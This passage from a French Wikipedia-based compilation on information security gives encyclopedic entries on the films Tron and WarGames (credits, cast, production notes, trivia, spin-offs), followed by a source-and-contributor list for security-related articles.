créateur de ces jeux, il parvient à leur échapper et entreprend de libérer le système de la main-mise du couple SARK/MCP. Il y parviendra en récupérant au passage la preuve de ses droits de propriété, provoquant la chute de Dillinger dont il récupère le poste de patron. Tron 464

Fiche technique

• Titre : Tron • Réalisation : Steven Lisberger • Scénario : Steven Lisberger, d'après une histoire de Steven Lisberger et Bonnie MacBird • Musique : Wendy Carlos •• Direction musicale : • Richard Bowden avec l'Orchestre philharmonique de Los Angeles • Douglas Gamley avec l'Orchestre philharmonique de Londres • Direction artistique : John Mansbridge et Al Roelofs sous la direction de Light Cycle, véhicule présent dans le Dean Edward Mitzner film

• Conception de l'univers électronique : Syd Mead, Jean "Moebius" Giraud, Peter Lloyd et Richard Taylor • Décors : Roger Shook • Costumes : Eloise Jensson et Rosanna Norton • Photographie : Bruce Logan • Ingénieurs du son : Michael Fremer et Frank Serafine • Effets spéciaux : R.J. Spetter • Effets visuels : Steven Lisberger • Montage : Jeff Gourson • Sociétés de production : Walt Disney Pictures et Lisberger/Kushner • Producteurs : Donald Kushner, Ron Miller et Harrison Ellenshaw • Budget : 17 000 000 $ • Format : Couleurs (Technicolor) - 2,20:1 - Stéréo (Dolby) - 70 mm - Filmé en Super Panavision 70[1] •• Genre : Fantastique, science-fiction •• Durée : 1h32 • Pays d'origine : États-Unis •• Dates de tournage : d'avril à juillet 1981 •• Lieux de tournage : •• Walt Disney Studios •• Laboratoire national de Lawrence Livermore • Dates de sortie[] : • États-Unis : 9 juillet 1982 • Royaume-Uni : 21 octobre 1982 • France : 8 décembre 1982 (Paris), 15 décembre 1982 (sortie nationale) • Box-office US : 33 000 000 $ Tron 465

Distribution

• Jeff Bridges (VF : Alain Dorval) : Kevin Flynn / Clu • Bruce Boxleitner (VF : Patrick Poivey) : Alan Bradley / Tron • David Warner (VF : Jacques Thébault) : Ed Dillinger / Sark / Voix du Maître Contrôle Principal (MCP) • Cindy Morgan (VF : Béatrice Agenin) : Lora / Yori r • Barnard Hughes (VF : Henri Labussière) : D Walter Gibbs / Dumont • Dan Shor (VF : Bernard Alane) : Ram • Peter Jurasik (VF : Roger Lumont) : Crom • Tony Stephano : Peter / Lieutenant de Sark • Craig Chudy : Guerrier #1 • Vince Deadrick Jr. : Guerrier #2 • Sam Schatz : Guerrier expert du disque • Jackson Bostwick (VF : Sady Rebbot) : Garde principal • David S. Cass Sr. : Garde de l'usine • Gerald Berns : Garde #1 • Bob Neill : Garde #2

Origine et production Le film provient d'un concept du réalisateur Steven Lisberger, passionné d'informatique[1]. Avec le producteur Donald Kushner, Lisberger a passé deux ans à rechercher les technologies pour réaliser le film[1]. Tron est le premier à utiliser l'imagerie informatique de manière intensive, non seulement comme un élément d'effets spéciaux comme dans Mondwest (1973) ou Star Wars (1977) mais pour concevoir un monde virtuel[1]. Parmi les responsables de l'équipe des effets spéciaux, on peut noter Syd Mead, Jean Giraud (Moebius) et l'illustrateur Peter Lloyd, tous supervisés par Harrison Ellenshaw et Richard Taylor[1]. Quatre sociétés d'informatique ont fourni les images de synthèse du film. Deux de Los Angeles : Information International Inc (Triple-I) et Robert Abel & Associates (RA&A) (fondé en 1971 par Robert « Bob » Abel (1937-2001) et Con Pederson), deux de New York : Digital Effects (fondée par Jeff Kleiser) et Mathematic Application Group Inc (MAGI) (fondée en 1966 par Phillip Mittelman), ce dernier ayant fourni la plus grande partie du travail grâce à l'installation d'un lien transcontinental avec les studios de Disney à Burbank[1]. Toutefois la durée de calcul nécessaire pour une scène permettait de couper le lien deux jours et demi à cinq jours entre chaque transmission[1]. Les scènes du monde virtuel étaient tournées à Burbank (puis retravaillées) tandis que les scènes du monde réel ont été tournées à Los Angeles et au Laboratoire national de Lawrence Livermore d'Oakland en Californie[1]. Afin d'assurer la promotion du film, le studio a produit une émission spéciale de 30 minutes, intitulée Computers are people, too! diffusée le 23 mai 1982 en syndication[2].

Effets spéciaux Tron est le premier film à utiliser des séquences retravaillées ou conçues par ordinateur. De plus, il faut se rappeler qu'en 1980, la souris (avec ses boutons et sa boule) n'était pas encore répandue. L'invention de la souris à boule date de 1979, et est restée confinée dans les universités et parcs de recherche et n'a émergé pour le public qu'en 1983 sur l'Apple Lisa. Et comme Disney ne possédait pas de ces ordinateurs expérimentaux, les informaticiens engagés par Disney ont travaillé de longues heures uniquement avec un clavier, en mode texte. Le rendu lissé et artificiel que l'on obtenait avec les images de l'époque n'est pas un défaut, puisqu'il permet de donner un caractère artificiel au monde de l'ordinateur par rapport à la réalité. Ce rendu a par ailleurs été utilisé plus tard par John Carpenter en 1996 pour le sous-marin dans Los Angeles 2013, les trucages ayant été faits par Buena Vista Visual Effects, qui est une branche de Disney. Tron 466

Autour du film Cette section ne cite pas suffisamment ses sources. Pour l'améliorer, ajouter en note des références vérifiables ou les modèles {{refnec}} ou {{refsou}} sur les passages nécessitant une source. • Sur un des murs lumineux de la salle de surveillance où Sark donne ses ordres et s'isole pour dialoguer avec le MCP, un petit Pac-Man clignote sur la droite de l'écran. (0:43:30) • Lors du passage en voilier solaire, on peut apercevoir une tête de Mickey Mouse au sol (1:09:29) •• La majeure partie du film se passe en un temps réel extrêmement court. En effet, tous les évènements dont l'action se situe dans le monde virtuel sont à l'échelle de l'informatique, c'est-à-dire que les temps sont mesurés en nanosecondes. On peut donc supposer que toute l'aventure de Flynn dans le monde virtuel ne dure que quelques secondes dans le monde réel. • Sur une affichette dans le bureau d'Alan Bradley, on peut lire les mots « Gort klaatu barada nikto », en référence à la formule qu'utilise Klaatu, l'alien du film Le Jour où la Terre s'arrêta (Robert Wise, 1951) pour diriger son robot, Gort. (0:27:11) • Le nom du film (et du personnage interprété par Bruce Boxleitner) TRON vient de elecTRONique. Bien avant la création du film, ses créateurs avaient inventé un personnage rétro-éclairé dont l'apparence renvoyait à un univers électronique. Cette première esquisse a d'abord été utilisée pour promouvoir des chaînes de radio aux États-Unis avant de donner naissance à un projet de film basé sur ce concept. •• Sur les vieux systèmes informatiques, la fonction "Trace On", appelée par la chaîne de commande "TRON" permettait de suivre les processus de fonctionnement d'un programme. Certaines rumeurs veulent que le personnage principal porte ce nom à cause de la fonction qu'il opère initialement dans le système informatique où il évolue. • MCP est l'acronyme de Maître Contrôle Principal en français et de Master Control Program en version originale. Master Control Program est le nom d'un système d'exploitation réel Burroughs MCP qui fonctionnait sur Burroughs large systems les plus grands mainframes de la compagnie Burroughs Corporation. • La forme du MCP fut également reprise par la série South Park pour représenter Moïse, la première fois dans l'épisode Les Scouts Juifs. Toujours dans la série South Park : dans l'épisode 4 de la saison 14, Vous avez 0 ami, Stan se fait happer par son profil Facebook devenu trop puissant et se retrouve dans un monde virtuel où tous les profils sont représentés par leur propriétaire et où, à l'image de l'univers de Tron, tous sont vêtus de combinaisons et de casques luminescents. • La bande originale du film comprend deux compositions du groupe Journey : Only Solutions et 1990's Theme. • Le clip de la chanson From Paris to Berlin d'Infernal, sorti en 2005, s'inspire de l'univers épuré de Tron, notamment ses courses de moto. • Le clip de la chanson Qu'en est-il de la chance de Pierre Lapointe, sorti en 2006, est lui aussi inspiré de la course de moto Tron, mais au lieu de laisser un mur derrière la moto, elle efface les lignes. • Le clip de la chanson 12:51 du groupe The Strokes, réalisé par Roman Coppola en 2003, s'inspire également du film. • Le clip de la chanson The Tron girl de The key of Awesome s’inspire de l'univers de Tron. • Le groupe français de musique électronique Daft Punk, lors de sa tournée mondiale "Alive 2007", rend hommage au film Tron : pendant leur concerts, lors du rappel (titre "Human After All/Together/One More Time (Reprise)/Music Sounds Better With You), les deux membres du groupe apparaissent vêtus de costumes de scène noirs à bandes orange rappelant les combinaisons cybernétiques des personnages du film. Ils participeront à la bande originale du film Tron : L'Héritage. • Dans le film I, Robot, réalisé par Alex Proyas, on peut relever plusieurs similitudes ; à la fin, l'officier de police Del Spooner (Will Smith) se jette dans un immense rayon lumineux qui est en fait l'ordinateur principal qui dirige Tron 467

tous les robots, afin de lui injecter un « virus » pour le détruire. À la fin de Tron, Kevin Flynn se jette dans un rayon lumineux qui est en fait le MCP, pour permettre à Tron d'y placer un programme qui le détruira. • Dans la série Chuck, qui prend place à Burbank, le héros Chuck Bartowski, geek devenu agent secret contre son gré, est un grand fan de Tron. On peut remarquer un poster du film dans sa chambre. • L'univers de Tron apparaît dans le jeu vidéo Kingdom Hearts 2 où il fait partie du système de l'ordinateur d'Ansem. • Une référence est faite dans l'épisode Simpson Horror Show VI des Simpson. • L'univers du clip du morceau Abiura di me, interprété par l'Italien Caparezza, reprend le design visuel de Tron ainsi que le Light Cycle. • La série Automan entre le 15 décembre 1983 et le 2 avril 1984 sur le réseau ABC (en France, à partir du 25 décembre 1987 sur La Cinq), reprend en partie l'univers de Tron. Le héros est un hologramme au costume lumineux dont la voiture prend des virages à 90°. • Dans l'épisode (Fin de partie) du Laboratoire de Dexter, Dexter tombe dans un univers similaire à celui de Tron. À noter aussi que dans cet épisode, il y a les mêmes "Light Cycle" du film et le maître du virtuel ressemble au MCP.

Distinctions Lauréat • 1983 : Saturn Awards : Saturn Award des meilleurs costumes[3] Nominations • 1983 : Oscars : Meilleurs costumes : Eloise Jensson et Rosanna Norton Meilleur son : Michael Minkler, Bob Minkler, Lee Minkler et James LaRue • 1983 : Saturn Awards : Meilleur film d'animation Meilleur film de science-fiction • 1983 : BAFTA Award des meilleurs effets spéciaux : Richard Taylor et Harrison Ellenshaw

Produits dérivés

Film Article détaillé : Tron : L'Héritage.

Série télévisée d'animation • Tron: Uprising, série d'animation diffusée depuis le 7 juin 2012 aux États-Unis sur Disney XD. Une bande-annonce est présente dans les bonus de l'édition vidéo de Tron : L'Héritage.

Jeu vidéo • FLTron. Jeu flash multijoueur: course de Light Cycle • GLTron. Jeux pour Mac, Windows et Linux: course de Light Cycle • Tron. Jeu d'arcade. • Discs Of Tron (1983). Un autre jeu d'arcade sur Tron. Tron 468

• Armagetron. Un autre jeu d'arcade libre sur Tron compatible Linux Mac et Windows. • Tron. Jeu sur Tron pour l'Atari 2600. • Tron: Deadly Discs, Tron: Maze-A-Tron et Tron: Solar Sailer. Trois jeux Tron sur Intellivision par Mattel. • Tron. Un jeu à cristaux liquide sur Tron par Tomy. • 2003 : Tron 2.0 ou Tron 2.0 : Killer App sur Windows, XBox (2004) et Game Boy Advance (2004). FPS/Aventure de Monolith Productions pour la version Windows, Climax pour la version Xbox, et Digital Eclipse pour la version Game Boy Advance. • Kingdom Hearts 2. RPG où l'univers de Tron n'est pas majoritaire mais est visité comme un "monde" par les héros Sora, Donald et Dingo, qui rencontrent Tron et vont affronter le MCP et son bras droit Sark pour sauver le monde des Utilisateurs. • Darwinia. Jeu par Introversion Software, grandement inspiré entre autres de Tron. • Tron: Evolution. Se situant scénaristiquement entre Tron et Tron : L'Héritage. • Hyperliner. Jeu multijoueur en flash inspiré de Tron, développé par Motion-Twin.

Jeu de société • TRON "Assault on MCP" Game (1981?). Édité par Ideal. De 2 à 4 joueurs pour une durée de jeu de 30 minutes.

Bandes originales

• 1982 : Tron de Wendy Carlos avec la participation du groupe Journey (réédition en 2002) • 2010 : Tron: Legacy de Daft Punk (bande originale de Tron : L'Héritage (2010)

Références

[1] Dave Smith, Disney A to Z: The Updated Official Encyclopedia, [2] Bill Cotter, The Wonderful World of Disney Television - A Complete History, 15-16

[3] Distinctions (http:/ / akas. imdb. com/ title/ tt0084827/ awards) - Internet Movie Database Wargames (film) 469 Wargames (film)

Pour les articles homonymes, voir Jeux de guerre (homonymie) et Wargame. Wargames

Données clés

Titre québécois Jeux de guerre

Titre original WarGames

Réalisation John Badham

Scénario Lawrence Lasker Walter F. Parkes

Acteurs principaux Matthew Broderick Dabney Coleman John Wood Ally Sheedy Barry Corbin

Pays d’origine États-Unis

Sortie 1983

Durée 114 min.

Pour plus de détails, voir Fiche technique et Distribution Wargames[1] ou Jeux de guerre au Québec (WarGames) est un film de science-fiction américain de John Badham, sorti en 1983.

Synopsis En pleine guerre froide, un hacker adolescent attaque sans le savoir le système informatique militaire américain : le NORAD. Ce système est géré par une intelligence artificielle appelée PROG (pour Plan de riposte opérationnel de guerre)[2] en version française et manque de déclencher, en faisant passer le niveau de sécurité américain à DEFCON 1, une guerre thermonucléaire globale contre le bloc de l'Est.

Fiche technique • Titre original : Wargames (WarGames selon la graphie de l'affiche) • Titre français : Wargames (WarGames selon la graphie de l'affiche) • Titre québécois : Jeux de guerre • Réalisation : John Badham • Scénario : Lawrence Lasker et Walter F. Parkes • Direction artistique : James J. Murakami • Décors : Angelo P. Graham • Costumes : Barry Francis Delaney • Photographie : William A. Fraker • Montage : Tom Rolf • Musique : Arthur B. Rubinstein • Production : Leonard Goldberg • Société de production : Metro-Goldwyn-Mayer, Sherwood, The Leonard Goldberg Company, United Artists Wargames (film) 470

• Société de distribution : Metro-Goldwyn-Mayer, United Artists •• Budget : 12 000 000 $ • Pays d'origine : États-Unis • Langue : anglais • Genre : Science-fiction • Format : Couleurs - 35 mm - 1,85:1 - Dolby stéréo •• Durée : 114 minutes •• Dates de sortie : • États-Unis : 3 juin 1983 • France : 14 décembre 1983

Distribution

• Matthew Broderick (VF : Thierry Bourdon) : David Lightman • Ally Sheedy (VF : Amélie Morin) : Jennifer Katherine Mack • Dabney Coleman (VF : William Sabatier) : le docteur John McKittrick • John Wood (VF : Dominique Paturel) : le professeur Stephen W. Falken / Robert Hume • Barry Corbin (VF : Jacques Deschamps) : le général Jack Beringer • James Tolkan (VF : Jacques Thébault) : l'agent Nigan du FBI

Distinctions • Nomination au Saturn Award du meilleur film de science-fiction 1984

Autour du film

• Le personnage principal aurait été inspiré par l'histoire du hacker Kevin Mitnick[4]. • Pour le personnage du professeur Stephen Falken, les scénaristes se sont inspirés du professeur de Cambridge Stephen Hawking. John Lennon fut initialement envisagé pour interpréter ce rôle. • L'utilisateur Stephen Falken a longtemps été présent dans le système d'exploitation NetBSD, en hommage à WarGames. • La production ne fut pas autorisée à pénétrer dans le vrai centre de commandement de Cheyenne Mountain et il fallut donc faire preuve d'imagination. Dans le commentaire audio sur le DVD, le réalisateur John Badham remarque que le vrai centre n'est pas aussi élaboré que dans le film. • Dans le film, l'ordinateur central du NORAD s'appelle « WOPR », un nom inspiré du Whopper, hamburger phare de la chaîne de restauration rapide Burger King. Dans les années 1970, le véritable ordinateur central du NORAD s'appelait « BURGR » (burger). • Ce film est le premier à faire référence à un pare-feu (firewall) informatique. • Pour rendre la voix de Joshua aussi synthétique que possible, James Ackerman lut ses dialogues en tenant le script à l'envers. (v.f. Micheline Bona) • Martin Brest fut le premier réalisateur du film, mais il dut être remplacé par John Badham, à la suite d'une dispute avec les producteurs sur le plateau de tournage. Certaines de ses scènes figurent toutefois dans le film. Wargames (film) 471

• Le matériel informatique utilisé est réel et correspond à celui utilisé à cette période. Le micro-ordinateur IMSAI 8080 de la société Fischer-Freitas, un double lecteur de disque souple FDC2-2 et un moniteur vidéo Zenith de 12 pouces. Le modem est un coupleur acoustique. • Le fonctionnement du WOPR est basé sur un apprentissage par renforcement où, tel Joshua (le fils du Professeur Falken), la machine cherche par optimisation mathématique à améliorer son comportement avec l'expérience, ce qui explique la répétition des scénarios de jeux de stratégie envisagés tout au long du film. En ce qui concerne les codes de lancement, il s'agit d'une recherche exhaustive, mais la progression par l'indication du nombre de caractères trouvés n'est pas justifiée. • En juillet 2008, une suite à ce film, Wargames: The Dead Code [5] (ou Wargames 2), est sortie directement en DVD.

Notes et références

[1] Orthographié War Games par certaines encyclopédies (ex. le Dictionnaire des films Larousse). [2] En VO, WOPR (pour War Operation Plan Response).

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=Wargames_(film)& action=edit

[4] Biographie Rotten.com (http:/ / www. rotten. com/ library/ bio/ hackers/ kevin-mitnick/ )

[5] http:/ / www. imdb. com/ title/ tt0865957/

• Portail de la sécurité informatique • Portail du cinéma américain • Portail de la Guerre froide Sources et contributeurs de l’article 472

Sources et contributeurs de l’article

Sécurité de l'information Source: http://fr.wikipedia.org/w/index.php?oldid=92401346 Contributeurs: Alain.Darles, Awk, Badmood, Chaoborus, ChevalierOrange, Copyleft, Cranien, Dominique natanson, Emirix, Expertom, GLec, Haypo, Intervalle, Jide, Lujean, MaCRoEco, Moumousse13, Oasisk, Olivierka, Srjbox, T, Tieno, Vazkor, 15 modifications anonymes

Sécurité des systèmes d'information Source: http://fr.wikipedia.org/w/index.php?oldid=94462132 Contributeurs: (:Julien:), A1b2c, ADELKIKI, Acidben, Alain.Darles, Alno, Alphonzoano, Alterte, Anakin, Archeos, Archibald, Aris, Askywhale, Awk, Badmood, Balougador, BasEI, Bergom, Bob08, Bortzmeyer, Bradipus, Chaoborus, ChevalierOrange, Chrono1084, Claude1980, Clearpowers, Clintm, Copyleft, Coyote du 86, Célestin Moreau, Céréales Killer, Daehan, DainDwarf, Dake, Dauphiné, David Berardan, David Latapie, Dhatier, DocteurCosmos, EBIOS, Ebesanco, Ecid, Ecosoq, Elimerl, En passant, Esprit Fugace, Expertom, FGacquer, FabienSchwob, Fatiha Benali, Galoric, Gene.arboit, Genium, Greudin, Gui82, Guimard, Gwalarn, Gzen92, Hamrttp, Hercule, Heureux qui comme ulysse, ISDecisions, Irønie, Iznogood, Iznogoud, J-L Cavey, JackPotte, Jazzzz, Jerome234, Jerome66, Jlrwiki, Jmfrance, JnRouvignac, Jon, Jpjp507, Jramio, Kalimsshar, Karimakov, Karl3i, Kilianours, Kilith, Klipper, Koko90, L'amateur d'aéroplanes, Lachaume, Lamiot, Laurent Nguyen, Le pro du 94 :), Leag, Litlok, Lmaltier, Localhost, Loi219, Manu1400, Marc Mongenet, Maurilbert, Medium69, Merlin8282, MetalGearLiquid, Michel.hoffmann, Mm, Moloko, Moreseed, Mrambil, Mro, Nguyenld, NicoV, Nicolas STAMPF, Nono64, Octo-bvi, Orthogaffe, Outs, Oz, PCcliniqueNet, PHO3N!X, Papagrieng, Pautard, Pejman, Phe, Pierre Coustillas, Pok148, Poleta33, R3f3, Ramboutan, Rhizome, Ripounet, Rolphin, Rolyz, Romanc19s, Rémih, Salsamontreal, Sam Hocevar, Sanao, Savh, Scullder, Sebf, Sebleouf, SecurInfos, Serge.philippe, Smaret, Speculos, Spooky, Sportet, T, T.vanderkluft, Thales Communications & Security, Thireus, Ticho, Tieno, Toutoune25, TranceFusion, Typhon07, Vazkor, Velero, Vev, Vintotal, Web33, Windharp, Wishmaster, Wmarcmc, Xiglofre, Yool, Zetud, Zouavman Le Zouave, 291 modifications anonymes

Insécurité du système d'information Source: http://fr.wikipedia.org/w/index.php?oldid=91045744 Contributeurs: ADELKIKI, Alain.Darles, Alterte, Awk, Ayin, Badmood, Bibi Saint-Pol, Chrono1084, Coyau, Deelight, DenisLebey, DocteurCosmos, EBIOS, Epommate, Gene.arboit, Grand Manutout, Gzen92, Hemmer, Iznogoud, Jasar3, Jerome66, Jmax, Kituse, Koko90, Liné1, Lmaltier, Mafiou44, Manu1400, Melkor73, Michel BUZE, Mig, Mirgolth, Nodulation, Nyco, Ordifana75, PHO3N!X, Pautard, Perso258741, Pierre ALLAIN, Romanc19s, Rune Obash, Sebletoulousain, Sherbrooke, Soregard, Speculos, T, Tegu, Tieno, Trimégiste, Vazkor, Visite fortuitement prolongée, Wenjy, 40 modifications anonymes

Politique de sécurité du système d'information Source: http://fr.wikipedia.org/w/index.php?oldid=81645106 Contributeurs: Alain.Darles, Angeldream, Badmood, Ccmpg, Claude1980, Crouchineki, Elfix, Fombelle, FrancoisT, Freetopian, GaMip, Hercule, IAlex, Jef-Infojef, Nono64, Olmec, Pautard, Poulos, Rhizome, T, Tieno, 18 modifications anonymes

Vulnérabilité (informatique) Source: http://fr.wikipedia.org/w/index.php?oldid=89919426 Contributeurs: Alextre, Archeos, Axelm, Badmood, Benottito, Billharry, Binnybin, Bob08, Bvs-aca, Cbio, Ce`dric, Chris93, Dhatier, Fm790, Fradelik, Gyu, HERMAPHRODITE, Jmax, JnRouvignac, Kesiah, Koko90, Kuja IX, Liquid 2003, Marc Mongenet, Marshall-Jey, Morespeed, Neitsa, Nodulation, Olivierka, Pautard, Rhadamante, Ripounet, Sebf, SecurInfos, Spooky, St Doane, Sunglasses, T, Tieno, Vazkor, Wantsriver, Weltersmith, Zelda, 39 modifications anonymes

Identité numérique (Internet) Source: http://fr.wikipedia.org/w/index.php?oldid=94473243 Contributeurs: 2A01:E35:8BCF:4920:FC28:FA1A:A33E:7303, Ahbon?, Alain-lefebvre, Anthere, Badmood, Bublegun, Cheap, ChloeD, Christophe64, CommonsDelinker, Crazycoders, Dacoucou, Digital Cover, Duboys Patrick, Emanuela Gambino, Eogez, Ericfreyssinet, Fanny Georges, GL, Gilles2284, Gmonseu, Guigui13parent, GéGé twin, Habertix, Haypo, Hbbk, Herr Satz, ILJR, Idéalités, Inmediatic, Julien Carnot, Lamiot, Leag, Lechat, Lighter14, Lomita, Ludovic89, Majau, Mathias Poujol-Rost, Nabeth, Nehemiah, Nouill, Ofol, Olivier tanguy, Ozara, Pautard, Phduquesne, Plouin, Plyd, Romanc19s, Seb35, Sebastienlever, Sebleouf, Shawn, Sirob V, Smaret, Spacebubble, Speculos, Tieno, Vazkor, Vinz1789, Vlaam, Yf, ZeMeilleur, Zil, Zordhak, Zyzomis, 69 modifications anonymes

Exploit (informatique) Source: http://fr.wikipedia.org/w/index.php?oldid=94499396 Contributeurs: Akiry, Archeos, Bloodqc, Canarix, Chris93, Chôji, DecereBrain, Epommate, GLec, HAF 932, Hbbk, Jamian, Jerome66, Kesiah, Khayil, Liquid 2003, Lithium57, Logophile F, Lovasoa, Mig, Moez ca, Nodulation, Nyco, ONAR, Optimisteo, Pautard, Pierrot Lunaire, Ploum's, Ripounet, Romainhk, Romanc19s, Sebleouf, Sebletoulousain, Sequajectrof, Speculos, Stanlekub, Ten0k, Tieno, Timn, Unique Nitrogen, Versgui, Zandr4, 25 modifications anonymes

Dépassement de tampon Source: http://fr.wikipedia.org/w/index.php?oldid=93608358 Contributeurs: Aldoo, Aoineko, AzertyFab, Barth taulier, Beatrin, Bloodqc, Ce`dric, Cgsyannick, Chris93, Daminetreg, DecereBrain, Deep silence, EDUCA33E, Franck Dernoncourt, Fredd, GLec, Haypo, Hercule, Inisheer, Katanga, Keikomi, Kikoogay, Liquid 2003, Lmaltier, Love Sun and Dreams, Mabifixem, MathsPoetry, Mig, MikeGyver, MisterMatt, Nicolas Ray, Nodulation, Nono64, Nykozoft, Ote, Pierre-Yves Rofes, Pierz, Rhadamante, Romain Thouvenin, Romainhk, Romanc19s, Ryo, Sam Hocevar, Sanadude, Sherbrooke, Silex6, SimonMalenky, Ske, Smaret, Symac, T, Tbowan, Ten0k, Tieno, Tonymainaki, TotalRecall, Toutoune25, Van Rijn, Xandi, 53 modifications anonymes

Rétroingénierie Source: http://fr.wikipedia.org/w/index.php?oldid=94553499 Contributeurs: Alno, Apc005, Archibald, Arkanosis, Arnaud.Serander, Ayin, BMR, Badmood, Barbetorte, Bloodqc, Cantons-de-l'Est, Ce`dric, Copyleft, Céréales Killer, Dake, Difool, Driftinghobo, Ediacara, Elnon, Francois Trazzi, Fv, GLec, Gdgourou, Gene.arboit, Ggal, Ghost dog, Greudin, Groumfy69, Hashar, Haypo, Jmax, Jul, Kuara, Lomita, Looxix, Manoillon, Mnem00, Mschlindwein, Orthogaffe, Phe, Piku, Psychoslave, R4f, Raph, Rhadamante, S0L0, Sam Hocevar, Sanao, Sterus, Stéphane33, SuperHeron, T, Tieno, Tixlegeek, Tornad, Trou, Vlaam, Wizou, 57 modifications anonymes

Shellcode Source: http://fr.wikipedia.org/w/index.php?oldid=89873337 Contributeurs: Archibald, Artiflo, AzertyFab, Canarix, ChloeD, Chris93, DecereBrain, Gzen92, Lmaltier, Manu1400, MisterMatt, Neitsa, Nykozoft, Orlodrim, Redpist, Sanadude, Stefp, Tbowan, Ten0k, Tieno, Toutoune25, TranceFusion, Xpo, 21 modifications anonymes

Attaque de l'homme du milieu Source: http://fr.wikipedia.org/w/index.php?oldid=94849440 Contributeurs: -=El Pingu=-, Abracadabra, Akeron, Awk, Axelm, Badmood, Bloodqc, Carlotto, Cheupi, CommonsDelinker, Dake, David Berardan, EDUCA33E, ErikvanB, GLec, Gcob, Gemini1980, Gene.arboit, Gilles.L, HLenormand, Haypo, Heavysilence, Hégésippe Cormier, Iznogood, Jobert, MathsPoetry, Mokarider, Nono64, Oxo, Phe, Phetu, Process 47, Sebf, Sebjarod, Sebletoulousain, Sherbrooke, Smaret, Solensean, Speculos, St Doane, Tegu, Tieno, Ziron, 29 modifications anonymes

Attaque de Mitnick Source: http://fr.wikipedia.org/w/index.php?oldid=83462065 Contributeurs: Archimëa, Bertol, Bloodqc, Chtit draco, Dhatier, Elg, Greudin, Jef-Infojef, L0stman, Louis-garden, Macassar, Markadet, MathsPoetry, Mig, Mro, Nodulation, Nono64, Notafish, ObiWan Kenobi, Ormolu Niblick, R, Sherbrooke, T, Tieno, Zil, 15 modifications anonymes

Attaque par rebond Source: http://fr.wikipedia.org/w/index.php?oldid=89871867 Contributeurs: Badmood, Canarix, Epommate, Haypo, Hemmer, Lozère, Lyondif02, MathsPoetry, Mirgolth, Nono64, P1gu1n, Romanc19s, Speculos, Tieno, 2 modifications anonymes

Balayage de port Source: http://fr.wikipedia.org/w/index.php?oldid=89920120 Contributeurs: (:Julien:), A3 nm, Boly38, DecereBrain, Doc103, E-t172, Elnon, Erwin, Geraldonez, HERMAPHRODITE, Haypo, Jean-no, Jon207, Koko90, Malost, MathsPoetry, Mig, Nono64, Raphluc, Stéphane33, Teo123, Tieno, 23 modifications anonymes

Attaque par déni de service Source: http://fr.wikipedia.org/w/index.php?oldid=94246833 Contributeurs: 2A01:E35:2E08:7FC0:E8A5:1E93:F2B9:342D, A2, Al.pliar, Askywhale, Axelm, BTH, Badmood, Boly38, Canarix, Cantons-de-l'Est, Chikipi, Chphe, CommonsDelinker, Criric, Cyprien.rangi, Céréales Killer, Dabeuliou, DaiFh, Deelight, Deep silence, Diti, DocteurCosmos, Dodocinelle, Elfi, Elfix, Elsewhere, Emilise, Frank9321, FredoB, Froggy25, GaMip, Genium, Ggal, Hesoneofus, Hevydevy81, Hyrka, Inisheer, Isherishen, Izwalito, JB, JackPotte, Jarfe, Jesmar, Keikomi, Kyro, L0stman, La Sirène, La-crevette-jaune, Leag, LectriceDuSoir, Ltrlg, Lyondif02, Mariinna, Marin M., Maxxtwayne, Melkor73, Mereck, Mig, Mishkoba, Moumine1997, MySteRe13, Natmaka, Necrid Master, NicolasB, Nodulation, Nono64, Nutsy, ObiWan Kenobi, Od1n, P1gu1n, PVF, Pautard, Pgy, Phildragonbleu, PouX, Projetsid, Quentinv57, Raziel, Richardbl, Ripounet, Romanc19s, Rudloff, Rédacteur Tibet, Rémih, S0l0xal, Sarpita, Seb35, Sebf, Siren, Sisqi, T, Thengen, Theoliane, Tieno, Titlutin, Toady, Totodu74, Toutoune25, Versgui, Vlaam, Yatobi, Zazaonwoueb, ZeMeilleur, Zil, Σ:-ζ)ξ, 132 modifications anonymes

Empoisonnement du cache DNS Source: http://fr.wikipedia.org/w/index.php?oldid=90312267 Contributeurs: Al Lemos, Bikepunk2, Bloodqc, Blub, Creasy, Dake, Fredd, Hussonl, Mro, Papatt, Piku, Rinaku, St Doane, Tieno, Toady, 14 modifications anonymes

Pharming Source: http://fr.wikipedia.org/w/index.php?oldid=93392572 Contributeurs: Asavaa, Axelm, Charlie Pinard, Greudin, Haypo, Kesiah, Loveless, Nadin123, Neros, Nono64, Sebfun, SharedX, Siren, Stéphane33, Tieno, Trente7cinq, Willi44reze, Zil, 7 modifications anonymes

Prise d'empreinte de la pile TCP/IP Source: http://fr.wikipedia.org/w/index.php?oldid=89968565 Contributeurs: AFAccord, DecereBrain, Dromygolo, Eberkut, GLec, Haypo, Sador, Tbowan, Tieno, Toutoune25, 4 modifications anonymes

Usurpation d'adresse IP Source: http://fr.wikipedia.org/w/index.php?oldid=91329494 Contributeurs: Bob08, Diwann, El Comandante, Eldann, F-fff, Francois Trazzi, Gdgourou, Jacques Ghémard, JujuTh, Kilith, L0stman, Lmaltier, Macassar, MathsPoetry, Mro, Nairod.brain, Neustradamus, NexusNet, Nono64, Nutsy, Ortholam, P1gu1n, Pamputt, Pano38, Papinpapin, Ralf, Sherbrooke, T, Tieno, Vchahun, Vladoulianov, Vspaceg, Zandr4, Zil, Zubro, 23 modifications anonymes

Wardriving Source: http://fr.wikipedia.org/w/index.php?oldid=89856412 Contributeurs: Alexis Domjan, ArséniureDeGallium, Bloodqc, Bob08, Cœur, DidierLoiseau, EDUCA33E, Greudin, Plyd, Prospere, Romanc19s, T, TiChou, Tieno, 10 modifications anonymes Sources et contributeurs de l’article 473

